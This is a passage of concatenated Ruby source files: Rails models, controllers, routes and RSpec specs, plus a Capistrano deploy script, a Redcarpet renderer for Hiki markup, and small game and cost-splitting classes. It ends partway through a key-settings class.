class Record < ApplicationRecord
belongs_to :zone
validates :name, presence: true
end
|
require 'support/models_shared_examples'

# Validation specs for User: name/email/password/password_confirmation,
# using the Japanese-locale error-message fragments below.
RSpec.describe User, type: :model do
  let(:valid_user) { build(:user) }
  let(:unique_user) { build(:user, :unique_user) }

  # Expected validation-message fragments (Japanese locale).
  let(:required) { "を入力してください。" }
  # Adjacent string literals are concatenated by Ruby: required + ", " + invalid.
  let(:required_and_invalid_params) { "を入力してください。" ", " "は不正な値です。" }
  let(:too_long_name) { "は128文字以内で入力してください。" }
  let(:too_long_email) { "は255文字以内で入力してください。"}
  let(:not_unique) { "はすでに存在します。" }
  let(:unmatched_regex) { "は不正な値です。" }
  let(:too_short_password) { "は6文字以上で入力してください。"}
  # Renamed from the misspelled `ummatched_password` for consistency with
  # `unmatched_regex`.
  let(:unmatched_password) { "とパスワードの入力が一致しません。"}

  context '値が正常な場合' do
    let(:valid_object) { valid_user }
    it_behaves_like :valid_object_examples
  end

  context '値が不正な場合' do
    let(:key) { :name }
    context 'nameが不正な場合' do
      context '空' do
        let(:error_message) { required }
        subject { build(:user, name: "") }
        it_behaves_like '空の場合'
      end
      context '129文字以上' do
        let(:error_message) { too_long_name }
        subject { build(:user, name: "a" * 129) }
        it_behaves_like '129文字以上'
      end
    end

    context 'emailが不正な場合' do
      let(:key) { :email }
      pending '空' do
        let(:error_message) { required_and_invalid_params }
        subject { build(:user, email: "") }
        it_behaves_like '空の場合'
      end
      context '256文字以上' do
        let(:error_message) { too_long_email }
        subject { build(:user, email: "a" * 245 + "@sample.com") }
        it_behaves_like '256文字以上'
      end
      context 'emailが一意でない' do
        subject { build(:user, email: "unique@sample.com") }
        it 'Userが作成されないこと' do
          unique_user.save
          subject.save
          is_expected.to be_invalid
        end
        it 'emailに正しいエラーメッセージが格納されること' do
          unique_user.save
          subject.save
          expect(subject.errors[:email]).to eq [not_unique]
        end
      end
      context 'emailが正規表現にマッチしない' do
        context 'メールアドレスに@がない' do
          subject { build(:user, email: "samplemail.com") }
          it 'Userが作成されないこと' do
            is_expected.to be_invalid
          end
          it 'emailに正しいエラーメッセージが格納されること' do
            subject.save
            expect(subject.errors[:email]).to eq [unmatched_regex]
          end
        end
        context '@の前に1文字以上の入力がない' do
          subject { build(:user, email: "@mail.com") }
          it 'Userが作成されないこと' do
            is_expected.to be_invalid
          end
          it 'emailに正しいエラーメッセージが格納されること' do
            subject.save
            expect(subject.errors[:email]).to eq [unmatched_regex]
          end
        end
        context '.の前に1文字以上の入力がない' do
          subject { build(:user, email: "sample@.com") }
          it 'Userが作成されないこと' do
            is_expected.to be_invalid
          end
          it 'emailに正しいエラーメッセージが格納されること' do
            subject.save
            expect(subject.errors[:email]).to eq [unmatched_regex]
          end
        end
        context '.の後に1文字以上の入力がない' do
          subject { build(:user, email: "sample@mail.") }
          it 'Userが作成されないこと' do
            is_expected.to be_invalid
          end
          it 'emailに正しいエラーメッセージが格納されること' do
            subject.save
            expect(subject.errors[:email]).to eq [unmatched_regex]
          end
        end
      end
    end

    context 'passwordが不正な場合' do
      let(:key) { :password }
      context '空' do
        let(:error_message) { required }
        subject { build(:user, password: "") }
        it_behaves_like '空の場合'
      end
      context '6文字未満' do
        let(:error_message) { too_short_password }
        subject { build(:user, password: "foo") }
        it_behaves_like '6文字未満'
      end
    end

    context 'password_confirmationが不正な場合' do
      let(:key) { :password_confirmation }
      context '空' do
        let(:error_message) { unmatched_password }
        subject { build(:user, password: "foobar", password_confirmation: "") }
        it_behaves_like '空の場合'
      end
      context '6文字未満' do
        let(:error_message) { unmatched_password }
        subject { build(:user, password: "foobar", password_confirmation: "foo") }
        it_behaves_like '6文字未満'
      end
      context 'パスワードとパスワード再確認が一致しない' do
        let(:error_message) { unmatched_password }
        subject { build(:user, password: "foobar", password_confirmation: "barfoo") }
        it_behaves_like 'パスワードとパスワード再確認が一致しない'
      end
    end
  end
end
|
require 'rails_helper'
# Model specs for Order: associations, cart-style item management, and the
# arrival-time estimate.
RSpec.describe Order, :type => :model do
let(:order) { create :order }
let(:item) { create :item}
# NOTE(review): `address` is defined but never used by the examples below.
let(:address) do
Address.new(order_id: 1, street_1: "123 Washington St", city: "Denver", state: "CO", zip: "80202")
end
it "belongs to one user" do
user = User.new
order.user_id = user.id
expect(order.user_id).to eq(user.id)
end
it 'is valid' do
expect(order).to be_valid
end
it 'has many items' do
item_1 = create :item, title: "Item1"
item_2 = create :item, title: "Item2"
item_1.orders << order
item_2.orders << order
assert item_1.orders.include?(order)
assert item_2.orders.include?(order)
end
it 'adds item to order' do
order.add_item(item)
assert order.items.include? item
end
it 'removes item from order' do
order.add_item(item)
order.remove_item(item)
refute order.items.include? item
end
# Adding the same item twice should bump quantity, not append a duplicate row.
it 'increases quantity if item is in order' do
order.add_item(item)
order.add_item(item)
assert order.items.length == 1
end
it 'tells arrival time when requested' do
order.order
order.request
assert_equal (order.updated_at + 45.minutes).strftime('%l:%M %p'), order.arrival_time
end
# Helper kept for spec-local use; mirrors `let(:item)`.
def build_item
create(:item)
end
end
|
require 'rest-client'

# Dashboard controller for the cloud platform: instance management plus
# resource/engine/task views backed by the Cloud Engine REST API.
class CloudPlatformController < ApplicationController
  before_action :authenticate_user!, :except => [:dataset]

  # Landing page (view only).
  def index
  end

  # Deletes the instances whose ids arrive joined by "-" in params[:id],
  # removing any stored input dataset file for each of them.
  def delete
    ids = params[:id].split("-")
    Instance.delete(ids)
    ids.each do |id|
      filename = dataset_file(id)
      File.delete(filename) if File.exist?(filename)
    end
    render :text => "OK"
  end

  # Shows one instance's results alongside the input parameters of the
  # configuration it was launched from.
  def show
    instance = Instance.find(params[:id])
    @results = instance[:results]
    configuration = ::Configuration.find(instance[:configuration_id])
    @input_params = ActiveSupport::JSON.decode(configuration[:params])
  end

  # JSON feed for the instances table; maps the numeric status column to a
  # human-readable label.
  def instances
    status = Array["Waiting","Submitted","Scheduled","Running","Done","Failed","Cancelled","Unknown","Cancellation"]
    results = Array.new
    instances = Instance.order(created_at: :desc).all
    instances.each do |instance|
      instance[:status] = status[instance[:status].to_i]
      results.push(instance)
    end
    table_data = { :recordsTotal => results.length, :recordsFiltered => results.length, :data => results }
    render :json => table_data
  end

  # Streams the stored input dataset for an instance (reachable without auth).
  def dataset
    send_file dataset_file(params[:id])
  end

  # Summary/providers/tasks/analysis panels for the resources dashboard.
  def resources
    load_date_and_period
    begin
      @response_summary = RestClient.get rest_api_url + '/summary/' + @period + '/' + @date.to_s
      @response_providers = RestClient.get rest_api_url + '/providers/' + @period + '/' + @date.to_s
      @response_tasks = RestClient.get rest_api_url + '/tasks/' + @period + '/' + @date.to_s
      @response_analysis = RestClient.get rest_api_url + '/analysis/' + @period + '/' + @date.to_s
    rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, Errno::ECONNREFUSED
      flash[:ce_error] = "Unable to connect to Cloud Engine."
      @response_summary = Hash.new
      @response_providers = Hash.new
      @response_tasks = Hash.new
      @response_analysis = Hash.new
    end
  end

  # Profile, utilization, and cost panels for a single engine.
  def resource
    @engine_id = params[:id]
    load_date_and_period
    begin
      @engine_profile = RestClient.get rest_api_url + '/engine/' + @engine_id
      @engine_utilization = RestClient.get rest_api_url + '/engine_utilization/' + @engine_id + '/' + @period + '/' + @date.to_s
      @engine_cost = RestClient.get rest_api_url + '/engine_cost/' + @engine_id + '/' + @period + '/' + @date.to_s
    rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, Errno::ECONNREFUSED
      flash[:ce_error] = "Unable to connect to Cloud Engine."
      @engine_profile = Hash.new
      @engine_utilization = Hash.new
      @engine_cost = Hash.new
    end
  end

  # Engines overview for the machines dashboard.
  def machines
    load_date_and_period
    begin
      @response_engines = RestClient.get rest_api_url + '/engines/' + @period + '/' + @date.to_s
    rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, Errno::ECONNREFUSED
      flash[:ce_error] = "Unable to connect to Cloud Engine."
      @response_engines = Hash.new
    end
  end

  # Task list for the tasks dashboard.
  def tasks
    load_date_and_period
    begin
      @response_tasks = RestClient.get rest_api_url + '/tasks/' + @period + '/' + @date.to_s
    rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, Errno::ECONNREFUSED
      flash[:ce_error] = "Unable to connect to Cloud Engine."
      @response_tasks = Hash.new
    end
  end

  # Charts page (view only).
  def chart
  end

  private

  # Path under which an instance's uploaded input dataset is stored.
  def dataset_file(id)
    Rails.root.join("storage/" + id.to_s + "_input_dataset.json")
  end

  # Populates @date/@period from params, defaulting to today and "day".
  # Previously this logic was copy-pasted into four actions.
  def load_date_and_period
    @date = params[:date].to_date unless params[:date].nil?
    @date ||= Date.today
    @period = params[:resources_period] unless params[:resources_period].nil?
    @period ||= "day"
  end

  # Base URL of the Cloud Engine REST API, built from ENGINE_CONFIG.
  def rest_api_url
    'http://' + ENGINE_CONFIG[:rest_api][:address] + ':' + ENGINE_CONFIG[:rest_api][:port].to_s + '/api/v1'
  end
end
|
# == Schema Information
#
# Table name: jobs
#
# id :integer not null, primary key
# client_id :integer
# data_destruction :string(255)
# no_items :integer default(0)
# collection_date :date
# priority :string(255)
# created_at :datetime
# updated_at :datetime
# third_party_destruction :string(255)
# admin_notes :text
# warehouse_notes :text
# reporting_required :boolean
# contact_user :string(255)
# items_booked :integer default(0)
# status_text :string(255) default("incoming")
# onhold :boolean default(FALSE)
# collection_instructions :text
# processing_instructions :text
# completion_date :date
# received_date :date
# archived_date :date
# booked_items_count :integer default(0)
# scanned_items :text default("--- []\n")
# failed_scanned_items :text default("--- []\n")
# scan_start :datetime
# scan_end :datetime
# scan_user :datetime
# processing_complete :boolean default(FALSE)
# scanning_complete :boolean default(FALSE)
# cost :decimal(12, 2) default(0.0)
# reporting_complete :boolean default(FALSE)
# costing_complete :boolean default(FALSE)
# cost_comments :text default("")
# estimated_cost :decimal(12, 2) default(0.0)
# free :boolean default(FALSE)
# location :string(255)
# interstate_pallet_id :integer default(0)
# wiping_complete :boolean default(FALSE)
# collection_address :text
# aquisition_source :text
# itemised_rebate :boolean default(FALSE)
# enforce_quarantine :boolean default(FALSE)
# interstate_rebate_confirmed :boolean default(FALSE)
# interstate_invoice_confirmed :boolean default(FALSE)
# interstate_rebate_amount :decimal(12, 2) default(0.0)
# interstate_rebate_notes :text
# service_type :string(255)
# recycling_notes :text
# recycling_weight :integer
#
require 'spec_helper'
# Placeholder spec generated alongside the Job model; flagged pending until
# real examples replace it.
describe Job do
pending "add some examples to (or delete) #{__FILE__}"
end
|
require 'active_record'
require 'rspec'
require_relative '../app/models/person'

# Connect ActiveRecord to the test database described in config/database.yml.
db_settings = YAML::load(File.open('config/database.yml'))
ActiveRecord::Base.establish_connection(db_settings['test'])

describe Person do
  it "should validate the presence of a first name" do
    nameless = Person.new(:given_name => '')
    expect(nameless.save).to eq false
  end

  it "should validate the presence of a family name" do
    familyless = Person.new(:family_name => '')
    expect(familyless.save).to eq false
  end

  it "should accept a mother" do
    mother = Person.new(:given_name => 'MyMother', :family_name => 'Mom')
    mother.save
    child = Person.new(:given_name => 'Me', :family_name => 'Myself')
    child.mother = mother
    child.save
    expect(child.mother).to eq mother
    expect(mother.mother).to eq nil
  end

  it "should accept a father" do
    father = Person.new(:given_name => 'MyFather', :family_name => 'L')
    father.save
    child = Person.new(:given_name => 'Me', :family_name => 'Myself')
    child.father = father
    child.save
    expect(child.father).to eq father
    expect(father.father).to eq nil
  end

  it "has grandparents" do
    # Maternal side.
    maternal_grandma = Person.new(:given_name => 'granny', :family_name => 'f')
    maternal_grandma.save
    maternal_grandpa = Person.new(:given_name => 'gramps', :family_name => 'f')
    maternal_grandpa.save
    mother = Person.new(:given_name => 'MyMother', :family_name => 'L')
    mother.mother = maternal_grandma
    mother.father = maternal_grandpa
    mother.save
    # Paternal side.
    paternal_grandma = Person.new(:given_name => 'grannyF', :family_name => 'f')
    paternal_grandma.save
    paternal_grandpa = Person.new(:given_name => 'grampsF', :family_name => 'f')
    paternal_grandpa.save
    father = Person.new(:given_name => 'MyFather', :family_name => 'L')
    father.mother = paternal_grandma
    father.father = paternal_grandpa
    father.save
    child = Person.new(:given_name => 'Me', :family_name => 'Myself')
    child.mother = mother
    child.father = father
    child.save
    # grandparents should return all four, in any order.
    expect(child.grandparents).to be_a Array
    expect(child.grandparents).to match_array [maternal_grandma, maternal_grandpa, paternal_grandma, paternal_grandpa]
  end
end
|
# Adds an indexed customer reference column to payments along with the
# matching foreign-key constraint on customers.
class AddCustomerRefPayment < ActiveRecord::Migration[5.2]
def change
add_reference :payments, :customer, index: true
add_foreign_key :payments, :customers
end
end
|
require 'spec_helper'

# Type-level specs for the custom Puppet type :system_attributes:
# key attribute, declared properties, value validation, and file autorequire.
describe Puppet::Type.type(:system_attributes) do
  # Modify params inline to tests to change the resource
  # before it is generated
  let(:params) do
    {
      :name => "/tmp/foo",
      :ensure => :present,
    }
  end

  # Modify the resource inline to tests when you modeling the
  # behavior of the generated resource
  let(:resource) { Puppet::Type.type(:system_attributes).new(params) }
  let(:provider) { Puppet::Provider.new(resource) }
  let(:catalog) { Puppet::Resource::Catalog.new }
  let(:error_pattern) { /Invalid/ }

  it "has :name as its keyattribute" do
    expect( described_class.key_attributes).to be == [:name]
  end

  describe "has property" do
    [
      :ensure, :archive, :hidden, :readonly, :system, :appendonly,
      :nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
      :sparse, :sensitive
    ].each do |prop|
      it prop do
        expect(described_class.attrtype(prop)).to be == :property
      end
    end
  end

  # Every boolean-ish attribute property accepts exactly :yes / :no.
  describe "accepts valid parameters for" do
    [
      :archive, :hidden, :readonly, :system, :appendonly,
      :nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
      :sparse, :sensitive
    ].each do |prop|
      context prop do
        [:yes,:no].each { |thing|
          it "accepts #{thing} " do
            params[prop] = thing
            expect{resource}.not_to raise_error
          end
        }
      end
    end
  end

  # Anything other than :yes / :no must raise a Puppet::Error
  # matching /Invalid/.
  describe "rejects invalid parameters for" do
    [
      :archive, :hidden, :readonly, :system, :appendonly,
      :nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
      :sparse, :sensitive
    ].each do |prop|
      context prop do
        [:false,:maybe,1].each { |thing|
          it "rejects #{thing} " do
            params[prop] = thing
            expect{resource}.to raise_error(Puppet::Error,error_pattern)
          end
        }
      end
    end
  end # Invalid values

  context "autorequires" do
    context "files" do
      it "does not require file when no matching resource exists" do
        # NOTE(review): `file` is a deliberately non-matching path; the local
        # is otherwise unused (candidate for `_file` if rubocop complains).
        file = Puppet::Type.type(:file).new(:name => "/tmp/bar")
        catalog.add_resource resource
        catalog.add_resource file
        expect(resource.autorequire.count).to eq 0
      end

      it "requires the matching file resource" do
        file = Puppet::Type.type(:file).new(:name => resource[:file])
        catalog.add_resource file
        catalog.add_resource resource
        reqs = resource.autorequire
        expect(reqs.count).to eq 1
        expect(reqs[0].source).to eq file
        expect(reqs[0].target).to eq resource
      end
    end
  end
end
|
#!/usr/bin/env ruby
# encoding: utf-8
# File: update.rb
# Created: 19/03/12
#
# (c) Michel Demazure <michel@demazure.com>

require_relative '../../jaccess.rb'
require_relative 'build_structure_tables.rb'
require_relative 'build_extended_tables.rb'

module JacintheReports
  # methods for building the association and field Jaccess tables
  module Update
    # before processing
    # Destructive-operation warning shown to the operator; each array entry
    # is printed on its own line by `puts`. (Runtime text — kept in French.)
    WARNING = ['', 'AVERTISSEMENT', 'Cette opération est destructrice !',
               'Les nombres affichés après l\'exécution doivent ressembler à',
               '   Tables : 40',
               '   Total joins : 40',
               '   Extended joins : 100',
               '   Extended fields : 1000',
               'Vérifiez aussi que les quatre fichiers des sous-dossiers',
               '\'structure\' et \'extended\' du dossier',
               "    #{J2R::DATA}",
               'ont bien été enregistrés.',
               'En cas d\'erreur, reconstituez-les à l\'aide des fichiers \'.bak\'.',
               '---------------']

    # build and dump joins and fields files
    # @param mode [String] configuration
    def self.dump_joins_and_fields_tables(mode)
      # Sizes are printed so the operator can compare against WARNING's
      # expected magnitudes.
      puts "Tables : #{JaccessTables.build_field_table(mode).size}"
      JaccessTables.dump_field_table
      puts "Total joins : #{JaccessTables.build_join_list(mode).size}"
      JaccessTables.dump_join_list
    end

    # build and dump extended lists files
    # @param mode [String] configuration
    def self.dump_extended_lists(mode)
      J2R.jaccess(mode)
      puts "Extended joins : #{ExtendedTables.extended_joins.size}"
      ExtendedTables.dump_extended_joins_list
      puts "Extended fields : #{ExtendedTables.extended_fields.size}"
      ExtendedTables.dump_extended_fields_list
    end

    # build and dump all DATA files
    # @param mode [String] configuration
    def self.dump_all_tables(mode)
      puts WARNING
      dump_joins_and_fields_tables(mode)
      dump_extended_lists(mode)
    end
  end
end

# Script entry point: rebuild every table in 'exploitation' mode.
if __FILE__ == $PROGRAM_NAME
  include J2R
  mode = 'exploitation'
  # mode = 'localadmin'
  Update.dump_all_tables(mode)
end
|
# Application variables
set :application, "puppet"
set :repository, "https://github.com/bashou/puppet.git"
set :deploy_to, "/root/#{application}"
set :shared_children, []
set :normalize_asset_timestamps, false

# SCM settings: deploy from git via a cached remote checkout.
set :scm, :git
set :scm_verbose, true
set :deploy_via, :remote_cache
set :copy_exclude, [".git/*",".gitignore"]
set :keep_releases, 3

# RVM / SSH settings. Deploys run as root without sudo.
set :rvm_bin_path, "/usr/local/rvm/bin"
set :user, "root"
set :use_sudo, false
default_run_options[:pty] = true
ssh_options[:keys] = [
  File.join(ENV["HOME"], ".ssh", "francetv_key"),
]

after "deploy:create_symlink", "deploy:cleanup"

# One-time machine bootstrap: ship the puppet tree and run bootstrap.sh.
namespace :bootstrap do
  task :default do
    # Specific RVM string for managing Puppet; may or may not match the RVM string for the application
    set :user, "root"
    # Set the default_shell to "bash" so that we don't use the RVM shell which isn't installed yet...
    set :default_shell, "bash"
    # We tar up the puppet directory from the current directory -- the puppet directory within the source code repository
    system("tar czf 'puppet.tgz' puppet/")
    upload("puppet.tgz","/tmp",:via => :scp)
    # Untar the puppet directory, and place at /etc/puppet -- the default location for manifests/modules
    run("tar xzf /tmp/puppet.tgz")
    try_sudo("rm -rf /etc/puppet")
    try_sudo("mv puppet /etc/puppet")
    # Bootstrap RVM/Puppet!
    try_sudo("bash /etc/puppet/bootstrap.sh")
  end
end

# Re-apply the puppet manifests on an already-bootstrapped machine.
namespace :puppet do
  task :default do
    # Specific RVM string for managing Puppet; may or may not match the RVM string for the application
    set :rvm_ruby_string, '1.9.3'
    set :rvm_type, :system
    set :user, "root"
    # We tar up the puppet directory from the current directory -- the puppet directory within the source code repository
    system("tar czf 'puppet.tgz' puppet/")
    upload("puppet.tgz","/tmp",:via => :scp)
    # Untar the puppet directory, and place at /etc/puppet -- the default location for manifests/modules
    run("tar xzf /tmp/puppet.tgz")
    try_sudo("rm -rf /etc/puppet")
    try_sudo("mv puppet/ /etc/puppet")
    # Run RVM/Puppet!
    run("rvmsudo -p '#{sudo_prompt}' puppet apply /etc/puppet/manifests/site.pp")
  end
end

# OS package refresh, run as the unprivileged "dosu" user.
namespace :update do
  task :default do
    # NOTE(review): with :use_sudo false, try_sudo runs the command verbatim,
    # so the explicit "sudo" prefix here is what elevates — but if :use_sudo
    # were ever enabled this would become "sudo sudo apt-get ...". Verify.
    set :user, "dosu"
    try_sudo("sudo apt-get update")
    try_sudo("sudo apt-get upgrade")
  end
end
module Redcarpet
  module Render
    # Redcarpet renderer that emits Hiki wiki markup instead of HTML.
    class Hiki < Base
      # @param render_extensions [Hash] supports :header_offset, an Integer
      #   subtracted from every heading level before rendering.
      def initialize(render_extensions)
        super()
        @header_offset = 0
        if render_extensions[:header_offset]
          @header_offset = render_extensions[:header_offset]
        end
      end

      def normal_text(text)
        text
      end

      # Inline escaping is intentionally a no-op for Hiki output; the HTML
      # entity-escaping variant is kept commented for reference.
      def escape_inline(text)
        ## text.gsub(/&/, "&amp;").gsub(/\"/, "&quot;").gsub(/>/, "&gt;").gsub(/</, "&lt;")
        text
      end

      # Code blocks become Hiki preformatted text (every line indented one space).
      def block_code(code, language)
        code_text = normal_text(code).chomp
        code_text.gsub!(/^/, ' ')
        "\n#{code_text}\n\n"
      end

      # Block quotes: every line prefixed with Hiki's `""` quote marker.
      def block_quote(quote)
        quote_text = normal_text(quote).chomp
        quote_text.gsub!(/^/, '""')
        "\n#{quote_text}\n\n"
      end

      # Raw HTML has no Hiki equivalent; emit a marker so a human rewrites it.
      def block_html(raw_html)
        html_text = raw_html.chomp
        warning = "XXX: BLOCK_HTML: YOU SHOULD REWRITE IT"
        "\n#{warning}\n#{html_text}\n\n"
      end

      def hrule
        "\n//hr\n"
      end

      def codespan(code)
        "``#{escape_inline(code)}``"
      end

      # Headings map to runs of '!' after applying @header_offset.
      # Levels outside 1..5 render as nil and are dropped by Redcarpet.
      def header(title, level, anchor = "")
        l = level - @header_offset
        case l
        when 1
          "\n! #{title}\n"
        when 2
          "\n!! #{title}\n"
        when 3
          # Bug fix: level 3 previously emitted "!!!!" — identical to level 4.
          "\n!!! #{title}\n"
        when 4
          "\n!!!! #{title}\n"
        when 5
          "\n!!!!! #{title}\n"
        end
      end

      def table(header, body)
        header_text = ""
        if header
          header_text = header
        end
        body.chomp!
        "#{header_text}\n\n#{body}\n"
      end

      def table_row(content)
        content + "\n"
      end

      def table_cell(content, alignment)
        "||#{content}"
      end

      # Images render as Hiki links; alt text wins over the title.
      def image(link, title, alt_text)
        text = alt_text || title
        "[[#{text}|#{link}]]"
      end

      def autolink(link, link_type)
        "[[#{escape_inline(link)}]]"
      end

      def link(link, title, content)
        "[[#{escape_inline(content)}|#{escape_inline(link)}]]"
      end

      def double_emphasis(text)
        "''#{escape_inline(text)}''"
      end

      def emphasis(text)
        "'#{escape_inline(text)}'"
      end

      def strikethrough(text)
        "==#{escape_inline(text)}=="
      end

      def linebreak
        "\n\n"
      end

      def paragraph(text)
        "\n\n#{text}\n"
      end

      # Bug fix: the rendered list items (+content+) were discarded and only
      # "\n" was returned, silently dropping every list from the output.
      # The item lines produced by #list_item are now emitted.
      def list(content, list_type)
        "\n#{content}"
      end

      def list_item(content, list_type)
        case list_type
        when :ordered
          "# #{content.strip}\n"
        when :unordered
          "* #{content.strip}\n"
        end
      end
    end
  end
end
|
require_relative 'minesweeper'
require_relative 'constants'
require_relative 'cell'
require_relative 'board_printer'
#
# Class for debugging the game manually (ad-hoc smoke tests, not a framework).
#
class Debug
  def run()
    puts "Hello! "
  end

  # Raises unless expected == actual. +message+ is now optional (the old
  # required-but-unused third argument broke two-argument call sites) and,
  # when given, is prepended to the failure text.
  def assert_equal(expected, actual, message = nil)
    if !(expected == actual)
      prefix = message ? "#{message}: " : ""
      raise "#{prefix}Expected #{expected} but got #{actual} instead"
    end
    puts "Assertion passed!"
  end

  # Demonstrates yielding to an optional block.
  def test_block()
    yield 5 if block_given?
  end

  def test_saving()
    Minesweeper.new(2,1,1).save_state("#{ENV['HOME']}/test_saving")
  end

  # Round-trips a Cell through its JSON representation.
  def test_json()
    cell = Cell.new(1,2, false)
    json = cell.to_json()
    from_json = Cell.from_json(json)
    puts "#{from_json}"
    # assert_equal(from_json.x, 1)
    # assert_equal(from_json.y, 2)
    # assert_false(from_json.has_bomb)
    # assert_false(from_json.is_flaged)
    # assert_false(from_json.has_been_clicked)
  end

  # Saves a small game to disk and recovers it.
  def test_game_state_saving()
    minesweeper = Minesweeper.new(2,3,0)
    minesweeper.build_board([[0,0]].to_set())
    minesweeper.play(1,0)
    minesweeper.save_state("#{ENV['HOME']}/minesweeper_state")
    minesweeper = Minesweeper.recover_from_disk("#{ENV['HOME']}/minesweeper_state")
    # board_state = minesweeper.board_state()
    # board_assertion([['?', '1'],
    #                  ['?', '?'],
    #                  ['?', '?']], board_state)
  end
end

# Bug fix: this script-entry guard used to live INSIDE the class body;
# it belongs at top level.
if __FILE__ == $0
  Debug.new().test_game_state_saving()
end
require './lib/participant'
# A named activity whose cost is split evenly among its participants.
class Activity
  attr_reader :name,
              :participants

  # @param activity [String] the activity name
  def initialize(activity)
    @name = activity
    @participants = []
  end

  # Builds a Participant from +info+ and registers it.
  def add_participant(info)
    participant = Participant.new(info)
    @participants << participant
  end

  # Total amount paid across all participants (0 when there are none).
  def calculate_cost
    @participants.sum(&:paid)
  end

  # Even share of the total cost per participant.
  # Robustness fix: returns 0 instead of raising ZeroDivisionError when
  # nobody has been added yet.
  # NOTE(review): integer division if paid amounts are Integers — confirm
  # whether fractional shares matter upstream.
  def split_cost
    return 0 if @participants.empty?
    calculate_cost / @participants.count
  end

  # Maps each participant's name (as a Symbol) to the amount they overpaid
  # (positive) or underpaid (negative) relative to the even split.
  def calculate_dues
    share = split_cost # hoisted: was recomputed for every participant
    @participants.each_with_object({}) do |participant, dues|
      dues[participant.name.to_sym] = participant.paid - share
    end
  end
end
|
class ReviewsController < ApplicationController
  before_action :set_review, only: [:show, :edit, :update, :destroy]
  # NOTE(review): before_actions run in declaration order, so :can_manage
  # fires BEFORE :authenticate_user!; current_user can be nil inside it
  # (guarded below). Consider declaring :authenticate_user! first.
  before_action :can_manage, except: [:index, :show, :create]
  before_action :authenticate_user!

  respond_to :html, :js

  # GET /reviews
  def index
    @reviews = Review.all
    respond_with(@reviews)
  end

  # GET /reviews/:id
  def show
    respond_with(@review)
  end

  # GET /reviews/:id/edit
  def edit
  end

  # POST /reviews — creates a review owned by the signed-in user.
  def create
    @review = current_user.reviews.new(review_params)
    @review.save
    @product = @review.product
    respond_with(@review)
  end

  # PATCH/PUT /reviews/:id
  def update
    @review.update(review_params)
    respond_with(@review.product, @review)
  end

  # DELETE /reviews/:id — 200 with empty body (consumed by JS).
  def destroy
    @review.destroy
    head :ok
  end

  private

  def set_review
    @review = Review.find(params[:id])
  end

  def review_params
    params.require(:review).permit(:msg, :user_id, :product_id)
  end

  # Redirects non-admins away from management actions.
  def can_manage
    # Idiom fix: `&&` instead of low-precedence `and` in a boolean condition.
    unless current_user && current_user.is_admin
      redirect_to :back, notice: 'Only Admin allow to manage'
    end
  end
end
|
require_relative './base'
module BandCampBX
  module Entities
    # Entity describing one CampBX order row; attribute readers are
    # generated from #mappings / #attribute_names by Base#setup_readers.
    class Order < Base
      class InvalidTypeError < StandardError; end

      # Converter lambda for the raw "Order Type" column:
      # "Quick Sell" -> :sell, "Quick Buy" -> :buy, otherwise raises
      # InvalidTypeError.
      def self.map_type
        lambda do |val|
          case val.to_s
          when 'Quick Sell' then :sell
          when 'Quick Buy'  then :buy
          else raise InvalidTypeError
          end
        end
      end

      # Attribute => converter used to coerce raw values into typed ones.
      def self.mappings
        {
          id:       map_int,
          datetime: map_time,
          type:     map_type,
          price:    map_decimal,
          amount:   map_decimal
        }
      end

      # Attribute => column header in the raw CampBX payload.
      def self.attribute_names
        {
          id:       "Order ID",
          datetime: "Order Entered",
          type:     "Order Type",
          price:    "Price",
          amount:   "Quantity"
        }
      end

      setup_readers
    end
  end
end
|
Rails.application.routes.draw do
  # Shared API route set, mixed into each version namespace via `concerns`.
  concern :api_base do
    resources :sessions, only: [:create]
    resources :registrations, only: [:create, :update, :destroy]
    # Products and categories are addressed by :slug instead of :id.
    resources :products, param: :slug
    resources :categories, param: :slug do
      # NOTE(review): a bare `get` inside a resources block nests under the
      # member/collection scope rules — verify the generated path is the
      # one the client expects (`rails routes`).
      get :just_category, to: "categories#just_category"
    end
    resources :cart_items, except: [:show, :edit]
    resources :charges
    resources :invoices
    delete :logout, to: "sessions#logout"
    get :logged_in, to: "sessions#logged_in"
    post "confirm", to: "charges#confirm"
    patch "shipped", to: "invoices#shipped"
    get "customerinfo", to: "charges#new"
    post "search_product", to: "products#search"
    get "specific_categories", to: "categories#specific"
    # NOTE(review): `root` inside a concern makes the namespace root, i.e.
    # /v1 -> static#home — confirm that is intentional.
    root to: "static#home"
  end

  namespace :v1 do
    concerns :api_base
  end
end
|
require_relative 'grid'
# A class called Game that controls the game: changing the grid, etc.
class Game
  attr_reader :grid

  def initialize(grid = Grid.new)
    @grid = grid
  end

  # Marks the tile at the given { x:, y: } coordinates as alive.
  # (Typo fix: parameter was spelled "coodinates".)
  def tile_alive(coordinates)
    @grid.tiles[coordinates[:x]][coordinates[:y]].birth
  end

  # Prompts the user for a coordinate pair and returns the parsed hash.
  # (Typo fixes in the user-facing prompt: "coodinate", "seperated".)
  def prompt_for_coordinates
    puts 'enter coordinate for a cell you want to start as alive (separated by a comma eg. 12,3)'
    input
  end

  # Parses "12,3" into { x: 12, y: 3 }; reads from stdin by default.
  def input(nasty_xy = gets.chomp)
    coordinates = nasty_xy.split(',')
    { x: coordinates[0].to_i, y: coordinates[1].to_i }
  end
end
|
module Trustworthy
  # Persistent key store backed by a YAML::Store file. Each user's secret
  # share ("point") is encrypted with a key derived from their password.
  class Settings
    # Opens +filename+ inside a store transaction and yields a Settings
    # wrapper; changes are committed when the block returns.
    def self.open(filename)
      store = YAML::Store.new(filename)
      # ultra_safe is only available on some PStore/YAML::Store versions.
      store.ultra_safe = true if store.respond_to?(:ultra_safe=)
      store.transaction do
        yield Trustworthy::Settings.new(store)
      end
    end

    def initialize(store)
      @store = store
    end

    # Encrypts +key+ under +password+ (scrypt-derived) and stores it for
    # +username+ along with the salt.
    def add_key(key, username, password)
      salt = SCrypt::Engine.generate_salt
      encrypted_point = _encrypt(key.to_s, salt, password)
      @store[username] = {'salt' => salt, 'encrypted_point' => encrypted_point}
    end

    # True when no keys have been stored yet.
    def empty?
      @store.roots.empty?
    end

    # Raw stored record ('salt' / 'encrypted_point') for +username+.
    def find_key(username)
      @store[username]
    end

    def has_key?(username)
      @store.root?(username)
    end

    # The secret can be recovered once at least two shares exist.
    def recoverable?
      @store.roots.count >= 2
